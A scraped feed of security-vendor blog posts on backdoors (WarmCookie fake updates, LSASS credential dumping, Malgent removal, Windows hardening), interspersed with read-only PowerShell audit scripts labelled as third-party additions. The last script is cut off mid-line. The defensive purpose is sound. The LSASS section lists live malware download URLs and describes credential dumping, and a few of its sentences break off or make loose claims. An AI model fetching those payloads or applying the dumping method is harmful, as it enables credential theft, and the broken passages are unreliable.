Backdoor – Gridinsoft Blog
https://gridinsoft.com/blogs
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.
Feed generated Sat, 28 Jun 2025 22:47:27 +0000

FakeUpdate Campaign Spreads WarmCookie Virus in France
https://gridinsoft.com/blogs/fakeupdate-campaign-warmcookie-virus-france/
Fri, 04 Oct 2024 11:06:48 +0000

FakeUpdate, a campaign of fake browser updates that pops up during regular Internet browsing, now targets users from France. The final target of the campaign appears to be deployment of WarmCookie backdoor, a recently discovered malware specimen.

FakeUpdate Spreads WarmCookie as Chrome, Edge Updates

Researchers at Gen Threat Labs have uncovered a campaign spreading the WarmCookie backdoor. At its core is the previously known FakeUpdate scheme, which tricks victims into downloading and running a fake web browser update. As I’ve mentioned in the introduction, these attacks are currently targeting users in France. Besides popular browsers like Google Chrome, Mozilla Firefox, and Microsoft Edge, the campaign also offers “updates” for apps like Java, VMware Workstation, Proton VPN, and WebEx. To do this, attackers hack or create websites that display fake browser update prompts. Sure enough, anyone who follows the prompt receives a malicious program under the guise of a browser update.

[Figure: Fake browser update site]

In fact, the FakeUpdate campaign is not entirely new, as similar campaigns have circulated online before. Nor is it new for WarmCookie to use tricky and unusual spreading schemes: researchers previously encountered this backdoor being distributed under the guise of job offers. This time, however, aside from the new distribution method, there is an updated version of WarmCookie. It now supports data and file theft, device profiling, program enumeration (through the Windows Registry), arbitrary command execution via CMD, screenshot capture, and installation of additional malware.

FakeUpdate France Campaign Details

In brief, the FakeUpdate site is designed to mimic the real one, featuring a pretty convincing URL. As of the time of writing, the site edgeupgrade[.]com was still operational. Clicking the Update button downloads an installation file “Install_x64.exe”, which is the WarmCookie backdoor. According to the researchers’ report, once launched, the malware performs standard checks for a virtual environment. If no virtual environment is detected, it gathers the system fingerprint and sends it to the attackers’ C2 server.

[Figure: WarmCookie infection chain (source: Gen Threat Labs)]

As previously mentioned, this backdoor provides attackers with unrestricted access to the compromised system. The latest campaign observed by Gen Threat Labs shows that WarmCookie has been upgraded with new capabilities, among them running DLLs from the temp folder and transmitting their output, alongside the ability to transfer and execute EXE and PowerShell files. Beyond basic data theft, attackers can also deliver payloads like ransomware.

Regarding legitimate web browser updates, all modern browsers on Windows are now automatically updated. This eliminates the need to download any installation files manually – the user may only need to restart the browser.

How to Stay Protected?

As this campaign relies on several distinct steps of user interaction, the key to avoiding this threat is proactive counteraction. The first and most effective measure is to remain vigilant while browsing the web. Even with highly convincing phishing campaigns, exercise caution when prompted to download or update software. Instead, always visit the official website of the application you intend to update.

Another proactive option is to use advanced anti-malware software with built-in Internet security. If the first precaution is overlooked, anti-malware software will block access to phishing pages. GridinSoft Anti-Malware offers advanced protection, including an Internet Security feature, making it a strong option to consider.

Trojan:Win32/LsassDump.A
https://gridinsoft.com/blogs/trojan-win32-lsassdump-a/
Tue, 01 Oct 2024 16:14:57 +0000

Trojan:Win32/LsassDump.A malware aims at gathering system credentials from the LSASS process memory dump.

Trojan:Win32/LsassDump.A is a detection that targets the LSASS process. Similar to other heuristic detections, it focuses on behavior rather than the file itself.

Trojan:Win32/LsassDump.A Overview

Trojan:Win32/LsassDump.A is a heuristic detection by Microsoft Defender, triggered by unauthorized access to the Windows LSASS process. As a heuristic detection, it flags attempts to access the process, particularly to dump its memory, regardless of whether they are initiated by malware or by a user. In both scenarios, Defender deems the behavior suspicious and responds accordingly.

[Figure: Trojan:Win32/LsassDump.A detection]

LSASS (Local Security Authority Subsystem Service) is a legitimate Windows process that enforces security policies, handles user authentication, and manages security tokens and credentials. In essence, a memory dump of this process contains user credentials, including passwords, in encrypted and sometimes unencrypted form. Unsurprisingly, attackers are keen on compromising this process.

This gives us a clue as to which malware can cause the Trojan:Win32/LsassDump.A detection. Backdoors often use information like that stored in LSASS memory to gain persistence, in particular to create a so-called shadow user. Some spyware samples do the same trick, most often ones that aim at long-term presence in the infected system.

Technical Analysis

Now let’s take a practical look at how the malware behaves on a system. Being a heuristic detection, it is based on observed behavior rather than a specific threat, so we’ll focus on the malware’s impact on the system rather than on a specific sample. Memory dumps can be obtained through various methods, including Task Manager, DLL Host, or DbgHelp.dll. Yet LSASS is the most attractive target, as its memory contains the most current information.

In this case, upon execution, the malware immediately performs checks to detect virtualized environments, sandboxes, or debuggers. The malware leverages the Windows Error Reporting component along with other legitimate processes, such as:

%windir%\System32\svchost.exe -k WerSvcGroup
%windir%\system32\WerFault.exe
wmiadap.exe /F /T /R

Further, it reviews a selection of registry values that can contain traces of virtualization or, at the very least, of enabled logging. These checks again point to the malware aiming at long-term persistence, hinting that we’re likely dealing with a backdoor.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallationType
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging\EnableModuleLogging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\Diagnosis
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Diagnostics.AsyncCausalityTracer
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Policies\Microsoft\Cryptography\Configuration

Once the malware verifies that the system isn’t virtualized or under debugging, it advances to the next phase – neutralizing security software. The resulting process tree is below, and it

C:\Windows\system32\services.exe
C:\Windows\system32\SecurityHealthService.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p

The malware then queries the following system values, in order to collect information about the client. Together with data it has got in previous steps

C:\Program Files\Windows Defender\MpClient.dll
C:\Program Files\Windows Defender\MpOAV.dll
C:\Program Files\Windows Defender\MsMpLics.dll
C:\Program Files\WindowsProtection\Updater.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer

Payload

During execution, the malware downloads certain files from https://developerr-bots[.]xyz. Those are likely configuration files, needed for this backdoor to get further instructions. Still, these can be malware payload files, too – it is entirely case-dependent.

https://developerr-bots.xyz/125688/Updater.exe?hash=AgADZw
https://developerr-bots.xyz/125688/Updater.exe?hash=AgADZwLQ

These “Updater.exe” files are then placed in several different directories across the system volume. Such a tactic makes manual removal much harder for users and also limits the damage to the malware when an antivirus program finds only one of the malicious files.

C:\Users\user\AppData\Local\Temp\DownloadScript\updater.exe
%SAMPLEPATH%\7e7e69685128bee624a05f06de2bbe0849cf7ca8629103136872a1b0ada46236.exe
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\999d72a4e033bba86d05407570c67cba\System.Management.Automation.ni.dll

The malware once again leverages WerFault.exe to silently terminate the lsass.exe process and generate a memory dump. That is exactly the action that causes the LsassDump.A detection.

After completing its operations, the malware reconnects to the C2 server and exfiltrates the collected data. As a backdoor, it transmits only basic system information and awaits further commands from the attacker. It is likely that the malware uses the same https://developerr-bots.xyz as the C2 server.
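For a defender who wants to check a host for the artifacts described in this analysis, here is an added PowerShell script (mine, not Gridinsoft's; the post itself contains no code). The dropped-file paths and the SHA-256 come from the listings above; the crash-dump folder, the WER LocalDumps key and the LSA RunAsPPL value are standard Windows locations that I add as the relevant check and mitigation, not something the post mentions. The script only reads; it removes nothing.

```powershell
# Added example, not from the Gridinsoft post: read-only hunt for the artifacts
# listed in the analysis above. Dropped-file paths and the SHA-256 come from the
# post; the crash-dump folder, the WER LocalDumps key and the RunAsPPL value are
# standard Windows locations added here as the relevant check and mitigation.

$iocHash = '7e7e69685128bee624a05f06de2bbe0849cf7ca8629103136872a1b0ada46236'

# Where the post reports the dropped "Updater.exe" copies.
$dropPaths = @(
    (Join-Path $env:LOCALAPPDATA 'Temp\DownloadScript\updater.exe'),
    'C:\Program Files\WindowsProtection\Updater.exe'
)

function Find-LsassDumpArtifacts {
    $findings = @()

    foreach ($path in $dropPaths) {
        if (-not (Test-Path -LiteralPath $path)) { continue }
        $hash = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash.ToLower()
        if ($hash -eq $iocHash) { $note = 'SHA-256 matches the analysed sample' }
        else { $note = "SHA-256 $hash (different build; still unexpected here)" }
        $findings += [pscustomobject]@{ Type = 'DroppedFile'; Detail = $path; Note = $note }
    }

    # WerFault.exe writes user-mode dumps to %LOCALAPPDATA%\CrashDumps by default,
    # or to the folder named in WER's LocalDumps\DumpFolder value. A dump named
    # lsass*.dmp is the artifact the LsassDump.A detection is about.
    $dumpDirs = @((Join-Path $env:LOCALAPPDATA 'CrashDumps'))
    $werKey = 'HKLM:\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps'
    $custom = (Get-ItemProperty -Path $werKey -ErrorAction SilentlyContinue).DumpFolder
    if ($custom) { $dumpDirs += [Environment]::ExpandEnvironmentVariables($custom) }
    foreach ($dir in $dumpDirs) {
        if (-not (Test-Path -LiteralPath $dir)) { continue }
        foreach ($dump in Get-ChildItem -LiteralPath $dir -Filter 'lsass*.dmp' -File) {
            $findings += [pscustomobject]@{ Type = 'LsassDump'; Detail = $dump.FullName; Note = "written $($dump.LastWriteTime)" }
        }
    }

    # Mitigation check: with LSA protection (RunAsPPL = 1) on, ordinary processes
    # cannot open LSASS for reading, which defeats this dumping technique.
    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
    if (-not $lsa -or $lsa.RunAsPPL -ne 1) {
        $findings += [pscustomobject]@{ Type = 'Hardening'; Detail = 'RunAsPPL'; Note = 'LSA protection is off; set HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL (DWORD) = 1 and reboot' }
    }

    return $findings
}

Find-LsassDumpArtifacts | Format-Table -AutoSize -Wrap
```

An empty table is the good outcome. A DroppedFile or LsassDump row means the host needs the removal steps below and a credential reset for every account that has logged on to it, because whatever was in LSASS memory at dump time has to be treated as exposed.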

How To Remove Trojan:Win32/LsassDump.A?

Removing Trojan:Win32/LsassDump.A can typically be handled by the built-in Windows security tools. However, to avoid such incidents, I recommend using an advanced anti-malware solution like GridinSoft Anti-Malware. Just follow this guide to eliminate the malware from your system and ensure robust, proactive protection going forward.

[Figure: GridinSoft Anti-Malware main screen]

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

[Figure: Scan results screen]

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

[Figure: Removal finished]

How to Remove Trojan:Win32/Malgent!MSR from Windows 11
https://gridinsoft.com/blogs/trojan-win32-malgent-msr/
Wed, 10 Jul 2024 13:04:59 +0000

If you’re seeing Trojan:Win32/Malgent!MSR detected by your antivirus, don’t panic. Your computer might be running slower than usual. You might notice strange processes eating up your system resources. Your antivirus keeps showing this detection and you’re not sure what to do.

This guide will help you remove this threat completely. Follow these step-by-step instructions to eliminate the threat. We’ll start with methods you can try right now, then move to more advanced techniques if needed.

Detection Name: Trojan:Win32/Malgent!MSR
Threat Type: Backdoor Trojan
Primary Function: Provides remote access to criminals, delivers additional malware
Common Sources: Cracked software, fake system tools, pirated programs
Risk Level: High – Can steal data and install more malware

What is Trojan:Win32/Malgent!MSR?

Trojan:Win32/Malgent!MSR is a backdoor that gives criminals remote access to your computer. The name “Malgent” stands for “Malicious Agent” because it works with other malicious programs. This threat usually comes bundled with fake software activators or cracked programs.

[Figure: Trojan:Win32/Malgent!MSR detection by Microsoft Defender (Windows 11)]

Once installed, this malware connects to remote servers controlled by criminals. It can download more malware to your system. It can also steal your personal information, similar to other information stealing malware we’ve analyzed.

Important Note: Sometimes Microsoft Defender flags legitimate programs like Tor Browser as Trojan:Win32/Malgent!MSR. This can be a false positive, similar to fake virus alerts. However, if you downloaded software from suspicious sources, treat this detection seriously.

How to Tell if You’re Infected

Look for these warning signs on your computer:

  • Slow computer performance – Your system takes longer to start and respond
  • High CPU usage – Task Manager shows processes using lots of resources
  • Unknown processes running – Strange programs appear in Task Manager
  • Antivirus alerts – Repeated detections of Trojan:Win32/Malgent!MSR or heuristic virus warnings
  • Network activity – Your internet connection seems busy even when you’re not using it
  • New files appearing – Files you didn’t create show up in system folders

Manual Removal Steps

You can remove Trojan:Win32/Malgent!MSR manually by following these steps carefully. Take your time with each step. Make sure you complete each one before moving to the next.

Step 1: Restart in Safe Mode

Safe Mode prevents the malware from running while you clean your system. Here’s how to start in Safe Mode:

  1. Press Windows + R keys together
  2. Type msconfig and press Enter
  3. Click the Boot tab
  4. Check the Safe boot option
  5. Select Minimal and click OK
  6. Restart your computer

Step 2: Check Running Processes

Look for suspicious processes that might be related to the malware:

  1. Press Ctrl + Shift + Esc to open Task Manager
  2. Click the Processes tab
  3. Look for these suspicious processes:
    • Random named .exe files with high CPU usage
    • Processes running from temp folders
    • Unknown processes with network activity
  4. Right-click suspicious processes and select End Task
  5. Note the file location before ending the process

Step 3: Delete Malicious Files

Remove files that the malware might have created. Check these common locations:

  1. Open File Explorer and navigate to these folders:
       C:\Users\[YourUsername]\AppData\Local\Temp\
       C:\Users\[YourUsername]\AppData\Roaming\
       C:\ProgramData\Microsoft\Windows\WER\Temp\
       C:\Windows\Temp\
       
  2. Look for recently created files with random names
  3. Delete any suspicious .exe files you don’t recognize
  4. Pay attention to files created around the time you noticed the infection

Step 4: Clean Startup Programs

Remove the malware from your startup programs so it doesn’t run when Windows starts:

  1. Press Windows + R and type msconfig
  2. Click the Startup tab
  3. Look for unknown programs or programs with suspicious names
  4. Uncheck any suspicious entries
  5. Click Apply and OK

Also check the startup folder:

  1. Press Windows + R and type shell:startup
  2. Delete any suspicious files in this folder

Step 5: Clean Registry Entries

Remove malicious registry entries. Be careful with this step:

  1. Press Windows + R and type regedit
  2. Navigate to these registry keys:
       HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
       HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
       HKEY_CURRENT_USER\Software\Classes\Local Settings
       
  3. Look for entries with suspicious names or paths to temp folders
  4. Right-click suspicious entries and select Delete
  5. Be careful not to delete legitimate Windows entries

Step 6: Check Scheduled Tasks

Malware often creates scheduled tasks to restart itself:

  1. Press Windows + R and type taskschd.msc
  2. Click Task Scheduler Library
  3. Look for tasks with random names or suspicious triggers
  4. Right-click suspicious tasks and select Delete
  5. Check if any tasks point to files in temp folders

Step 7: Clear Temporary Files

Clean up temporary files where malware might hide:

  1. Press Windows + R and type %temp%
  2. Select all files (Ctrl + A) and delete them
  3. Empty your Recycle Bin
  4. Run Disk Cleanup to remove additional temporary files

Step 8: Restart Normally

After completing all steps, restart your computer normally:

  1. Press Windows + R and type msconfig
  2. Click the Boot tab
  3. Uncheck Safe boot
  4. Click OK and restart
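The same sweep as Steps 4 to 6, as an added PowerShell script that is mine rather than part of the guide: it lists the Run keys, the Startup folder and scheduled task actions in one table and marks entries that launch from the temp folders named in Step 3. The set of suspect folders is my assumption drawn from that step; expect a few legitimate hits from AppData\Roaming, so treat the flag as a prompt to look, not a verdict. It changes nothing; deletion remains the manual step the guide describes.

```powershell
# Added example, not part of the guide: a read-only audit of the autostart
# locations from Steps 4 to 6 that flags entries launching from the temp
# folders named in Step 3. It deletes nothing; removal stays a manual decision.

# Folders from Step 3; my assumption is that a legitimate autostart entry
# rarely points into them. AppData\Roaming will produce some legitimate hits.
$suspectDirs = @(
    $env:TEMP,
    (Join-Path $env:LOCALAPPDATA 'Temp'),
    $env:APPDATA,
    'C:\ProgramData\Microsoft\Windows\WER\Temp',
    'C:\Windows\Temp'
)

function Test-SuspectPath {
    param([string]$Command)
    if (-not $Command) { return $false }
    $expanded = [Environment]::ExpandEnvironmentVariables($Command)
    foreach ($dir in $suspectDirs) {
        if ($dir -and $expanded.IndexOf($dir, [StringComparison]::OrdinalIgnoreCase) -ge 0) {
            return $true
        }
    }
    return $false
}

function Get-AutostartEntries {
    $entries = @()

    # Step 4 / Step 5: the Run keys for the current user and the machine.
    $runKeys = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
               'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        foreach ($prop in (Get-ItemProperty -Path $key).PSObject.Properties) {
            if ($prop.Name -like 'PS*') { continue }   # provider metadata, not an entry
            $entries += [pscustomobject]@{ Source = $key; Name = $prop.Name; Command = [string]$prop.Value }
        }
    }

    # Step 4: the per-user Startup folder (shell:startup).
    $startup = [Environment]::GetFolderPath('Startup')
    foreach ($file in Get-ChildItem -LiteralPath $startup -File -ErrorAction SilentlyContinue) {
        $entries += [pscustomobject]@{ Source = 'shell:startup'; Name = $file.Name; Command = $file.FullName }
    }

    # Step 6: scheduled tasks, one row per action so the executable is visible.
    foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }
            $entries += [pscustomobject]@{
                Source  = "Task $($task.TaskPath)$($task.TaskName)"
                Name    = $task.TaskName
                Command = "$($action.Execute) $($action.Arguments)".Trim()
            }
        }
    }

    foreach ($entry in $entries) {
        $entry | Add-Member -NotePropertyName Suspect -NotePropertyValue (Test-SuspectPath $entry.Command) -PassThru
    }
}

# Flagged entries first; still read the rest for random-looking names the
# path heuristic cannot catch.
Get-AutostartEntries | Sort-Object Suspect -Descending | Format-Table Suspect, Source, Name, Command -AutoSize -Wrap
```

Run it once from Safe Mode before Step 2 so you have a baseline, and again after Step 8: any entry that reappears after you removed it points to a persistence mechanism the manual steps did not reach, which is the situation the automatic removal section below is for.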

Automatic Removal with GridinSoft Anti-Malware

Manual removal can be complex and time-consuming. For a faster, more reliable solution, GridinSoft Anti-Malware offers automatic detection and removal of backdoor trojans like Malgent. Professional anti-malware software can find hidden components and registry changes that you might miss.

The automatic approach is especially useful if you’re not comfortable editing the registry or if the manual steps didn’t completely remove the threat.

[Figure: GridinSoft Anti-Malware main screen]

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

[Figure: Scan results screen]

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

[Figure: Removal finished]

Browser Cleanup

If you suspect the malware affected your browser, clean it thoroughly:

Remove Malicious Browser Extensions

Check all your browsers for suspicious extensions:


Google Chrome

  1. Launch the Chrome browser.
  2. Click on the icon "Configure and Manage Google Chrome" ⇢ Additional Tools ⇢ Extensions.
  3. Click "Remove" next to the extension.

If you have an extension button on the browser toolbar, right-click it and select Remove from Chrome.

Mozilla Firefox

  1. Click the menu button, select Add-ons and Themes, and then click Extensions.
  2. Scroll through the extensions.
  3. Click on the … (three dots) icon for the extension you want to delete and select Delete.

Microsoft Edge

  1. Launch the Microsoft Edge browser.
  2. Click the three dots (…) menu in the top right corner.
  3. Select Extensions.
  4. Find the extension you want to remove and click Remove.
  5. Click Remove again to confirm.

Alternatively, you can type edge://extensions/ in the address bar to access the extensions page directly.

Opera

  1. Launch the Opera browser.
  2. Click the Opera menu button in the top left corner.
  3. Select Extensions ⇢ Manage extensions.
  4. Find the extension you want to remove and click the X button next to it.
  5. Click Remove to confirm.

Alternatively, you can type opera://extensions/ in the address bar to access the extensions page directly.

Reset Your Browser

If you suspect browser-based components of the malware, reset your browser completely:


Google Chrome

  1. Click the three vertical dots (⋮) in the top right corner and choose Settings.
  2. Choose Reset and Clean up, then Restore settings to their original defaults.
  3. Click Reset settings.

Mozilla Firefox

  1. In the upper right corner click the three-line icon and choose Help.
  2. Choose More Troubleshooting Information.
  3. Choose Refresh Firefox…, then Refresh Firefox.

Microsoft Edge

  1. Click the three dots (…) menu.
  2. Choose Settings.
  3. Click Reset Settings, then click Restore settings to their default values.

Opera

  1. Launch the Opera browser.
  2. Click the Opera menu button in the top left corner and select Settings.
  3. Scroll down to the Advanced section in the left sidebar and click Reset and clean up.
  4. Click Restore settings to their original defaults.
  5. Click Reset settings to confirm.

Alternatively, you can type opera://settings/reset in the address bar to access reset options directly.

How to Prevent Future Infections

Trojan:Win32/Malgent!MSR typically spreads through these methods. Avoid them to stay safe:

Avoid Suspicious Software

  • Don’t download cracked software – This is the most common source of Malgent infections. Learn about the dangers of cracked games and software
  • Avoid fake system tools – Programs claiming to “speed up” or “clean” your computer often contain malware
  • Don’t use unauthorized activators – Windows and Office activators frequently contain backdoors
  • Be careful with “free” versions – Legitimate paid software offered for free is usually infected

Practice Safe Computing

  • Keep Windows updated – Install security updates promptly
  • Use reputable antivirus software – Keep it updated and running. Be careful not to disable Windows Defender unless necessary
  • Download from official sources – Use official websites and app stores
  • Scan downloads – Check files before running them
  • Create regular backups – Keep important files backed up safely

Monitor Your System

Watch for signs of infection:

  • Check Task Manager regularly for unknown processes
  • Monitor your network usage for unusual activity
  • Pay attention to system performance changes
  • Keep an eye on your startup programs

Frequently Asked Questions

What is Trojan:Win32/Malgent!MSR and why is it dangerous?

Trojan:Win32/Malgent!MSR is a backdoor trojan that gives criminals remote access to your computer. It’s dangerous because it can steal your personal information, install more malware, and use your computer for criminal activities without your knowledge. Understanding trojan malware facts can help you recognize these threats better.

How did Trojan:Win32/Malgent!MSR get on my computer?

This malware usually comes bundled with cracked software, fake system tools, or pirated programs. It can also spread through infected email attachments or malicious websites. The most common source is downloading “free” versions of paid software.

Can I remove Trojan:Win32/Malgent!MSR manually?

Yes, you can remove it manually by following the steps in this guide. However, manual removal requires careful attention to detail and can be time-consuming. If you’re not comfortable with technical procedures, automatic removal tools are safer and more reliable.

Is it safe to delete processes related to Malgent?

Yes, it’s safe to delete malicious processes related to Malgent. The trojan creates these processes to maintain its presence on your system. However, be careful not to delete legitimate Windows processes. When in doubt, research the process name before deleting it.

What if my antivirus shows false positive detections?

Sometimes legitimate programs like Tor Browser are incorrectly flagged as Trojan:Win32/Malgent!MSR. If you downloaded software from official sources and you’re sure it’s legitimate, you can add it to your antivirus exclusions. However, if you downloaded from suspicious sources, treat the detection as real.

How can I prevent Trojan:Win32/Malgent!MSR infections?

Avoid downloading cracked software, fake system tools, and unauthorized program activators. Download software only from official sources. Keep your operating system and antivirus updated. Be cautious with email attachments and suspicious websites.

What if manual removal doesn’t work?

If manual removal doesn’t completely eliminate the threat, use professional anti-malware software like GridinSoft Anti-Malware. Some variants of this trojan can be particularly persistent and may require specialized removal tools to completely clean your system. You might also encounter similar issues with other persistent trojans that need automatic removal.

Can Trojan:Win32/Malgent!MSR steal my passwords?

Yes, this backdoor trojan can steal passwords and other sensitive information. It can capture keystrokes, take screenshots, and access stored credentials in your browsers. If you suspect you’re infected, change your important passwords after cleaning your system.

Does Trojan:Win32/Malgent!MSR affect all versions of Windows?

This malware can affect various Windows versions, including Windows 10 and Windows 11. The removal steps in this guide work for most Windows versions, though some interface details might vary slightly between versions.

How do I know if the removal was successful?

After removal, monitor your system for a few days. Check if your computer performance improves, if unknown processes disappear from Task Manager, and if your antivirus stops showing detections. Run a full system scan to confirm the threat is gone.

Quick Summary: Trojan:Win32/Malgent!MSR is a backdoor that provides criminals remote access to your computer. Remove it manually by cleaning processes, files, registry entries, and startup programs. For easier removal, use professional anti-malware software. Prevent future infections by avoiding cracked software and suspicious downloads.

Conclusion

Removing Trojan:Win32/Malgent!MSR from your computer is possible with the right approach. The manual method works well if you follow each step carefully. However, automatic removal tools provide better protection against hidden components and future threats.

Remember that prevention is always better than removal. Avoid downloading software from untrusted sources. Keep your system updated and use reliable antivirus protection. These simple steps will help you avoid most malware infections.

If you found this guide helpful, you might also want to read about similar trojan variants, PUA detections, and connection security issues.

How to Secure Windows 10 from Hackers
https://gridinsoft.com/blogs/8-best-practices-windows-10-security/
Thu, 04 Jul 2024 08:36:35 +0000

Windows 10 boasts valuable features, providing comfortable tools for user PCs and safeguarding confidential data. However, to secure Windows 10 effectively, it is crucial to understand that its market dominance, with over 85% of user devices, makes it a prime target. This operating system has many vulnerabilities that attackers actively exploit. Below is a useful guide with essential tips to help you enhance your Windows security.

Secure Windows 10: Useful Tips

1. Update Your Software Regularly

Regular updates are essential to secure Windows 10 from hackers. By updating Windows and all your software, you close the holes hackers use to access your computer. Developers create updates to shield private information by fixing code bugs and eliminating incompatibilities. Larger software packages in particular tend to contain vulnerabilities that hackers are more likely to discover and exploit.

Each time attackers discover new loopholes or methods to hack into systems, developers release new versions of these crucial updates. Unfortunately, many users neglect these updates, sticking with outdated software versions, which hackers exploit to breach security.

[Figure: Windows 10 security update]

2. Turn on Your Firewall

The Windows Firewall is a robust network security system integrated into recent Windows operating systems, including Windows 10, designed to protect internal networks from external threats like intruders or malware. A firewall may be implemented in hardware or software, and it tracks incoming and outgoing traffic. The firewall allows or blocks data packets based on established security rules, acting as a crucial barrier to secure Windows 10 from incoming threats.

[Figure: Firewall scheme]

Follow these steps to enable the Windows 10 Firewall and protect your computer:

1. Open Control Panel:

  • Click the Start menu.
  • Type Control Panel in the search bar and select it from the list of results.

2. Navigate to Windows Firewall:

  • In the Control Panel, click on System and Security.
  • Then click on Windows Defender Firewall.

3. Turn on Windows Firewall:

  • On the left side of the screen, click on Turn Windows Defender Firewall on or off.
  • Under both the Private network settings and Public network settings, select the option to Turn on Windows Defender Firewall.
  • Click OK to save your settings and activate the firewall.
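As an added example (mine, not the article's), the same three steps from PowerShell, with a verification the Control Panel dialog does not show as plainly. Run it from an elevated prompt; the default inbound/outbound actions and the logging switch are my additions to what the steps above set.

```powershell
# Added example, not from the Gridinsoft article: enable Windows Defender
# Firewall on all three profiles (the Control Panel steps above), then verify.
# Run from an elevated PowerShell prompt.

# Turn the firewall on for every profile. Blocking unsolicited inbound
# connections and allowing outbound ones is the default Windows posture; setting
# it explicitly undoes any earlier change.
Set-NetFirewallProfile -Profile Domain, Private, Public -Enabled True `
    -DefaultInboundAction Block -DefaultOutboundAction Allow

# Verify: every row should show Enabled = True and DefaultInboundAction = Block.
Get-NetFirewallProfile |
    Format-Table Name, Enabled, DefaultInboundAction, DefaultOutboundAction -AutoSize

# Log dropped packets so that blocked connection attempts are visible afterwards
# (default log: %SystemRoot%\System32\LogFiles\Firewall\pfirewall.log).
Set-NetFirewallProfile -Profile Domain, Private, Public -LogBlocked True
```

If a profile still reports Enabled = False after this, something with higher precedence is setting it, typically a Group Policy on a domain-joined machine or a third-party security suite that has registered itself as the firewall; that is worth knowing before relying on the built-in one.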

3. Use Device Encryption or BitLocker to Protect Your Hard Drive

Encryption works by scrambling data with a complex cipher that makes the information unreadable without the correct password. Many versions of Windows 10 Home include Windows Device Encryption. This feature allows you to encrypt files and folders on demand and create disk partitions to store encrypted bulk data, greatly enhancing your chances to secure Windows 10 and maintain the integrity of your files. However, be aware that using disk encryption utilities might slow down weaker systems or those equipped with HDDs, as these tools can impact performance.

Here are the steps to set up BitLocker on your Windows 10 device:

1. Check if BitLocker is Available:

  • Open the Control Panel.
  • Navigate to System and Security > BitLocker Drive Encryption.
  • If BitLocker is not available, your version of Windows may not support it, or your hardware may lack a Trusted Platform Module (TPM) chip.

2. Turn On BitLocker:

  • Choose the drive you want to encrypt from the list.
  • Click Turn on BitLocker.
  • BitLocker will check if your system meets the requirements for encryption.

3. Choose How to Unlock at Startup:

  • You will be asked how you want to unlock the drive at startup. Options typically include using a password or a smart card.
  • Choose Use a password to unlock the drive and enter a strong password.

4. Save Your Recovery Key:

  • BitLocker will prompt you to save a recovery key, which can be used to access your encrypted drive if you forget your password.
  • You can save it to your Microsoft account, a file, a USB drive, or print it.
  • It’s crucial to save the recovery key in a secure location separate from your computer.

5. Choose Encryption Options:

  • Select whether to encrypt the used disk space only (faster and best for new PCs and drives) or the entire drive (best for PCs and drives already in use).
  • Click Next to continue.

6. Start the Encryption Process:

  • Review your choices and click Start encrypting.
  • The encryption process can take several hours, depending on the size of the drive and the data stored on it.

Once BitLocker is enabled, your drive is protected. Every time you start your device, you will need to enter the password or have the smart card to access the encrypted drive. This ensures that your data is secure even if your device is lost or stolen.
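Steps 1 to 6 above driven from an elevated PowerShell prompt, as an added example that is not the post's own procedure. It assumes a PC with a ready TPM and uses the TPM instead of the startup password from step 3 (a password-only OS drive needs an extra Group Policy setting first), and it assumes a removable drive mounted as E: for the recovery key.

```powershell
# Added example (not from the original post): the BitLocker setup above with the
# BitLocker PowerShell module. Assumes a ready TPM; the TPM protector replaces the
# post's startup-password option, which needs the "Require additional authentication
# at startup" policy before Windows accepts it on the OS drive.
#Requires -RunAsAdministrator

function Test-BitLockerReady {
    # Step 1: BitLocker cmdlets present (Pro/Enterprise/Education) and a usable TPM.
    if (-not (Get-Command Enable-BitLocker -ErrorAction SilentlyContinue)) {
        throw 'BitLocker is not available on this edition of Windows.'
    }
    $tpm = Get-Tpm
    if (-not ($tpm.TpmPresent -and $tpm.TpmReady)) {
        throw 'No ready TPM found; prepare it (or enable the startup-password policy) first.'
    }
}

function Protect-SystemDrive {
    param(
        # Step 4: where the recovery key goes. Must be a different drive from the one
        # being encrypted; 'E:\' in the call below is an assumed removable drive.
        [Parameter(Mandatory)] [string] $RecoveryKeyFolder
    )
    $drive = $env:SystemDrive

    # Steps 2, 5 and 6: turn BitLocker on with a recovery password protector,
    # XTS-AES-256, used space only (the post's "faster, best for new PCs" option).
    $vol = Enable-BitLocker -MountPoint $drive -EncryptionMethod XtsAes256 `
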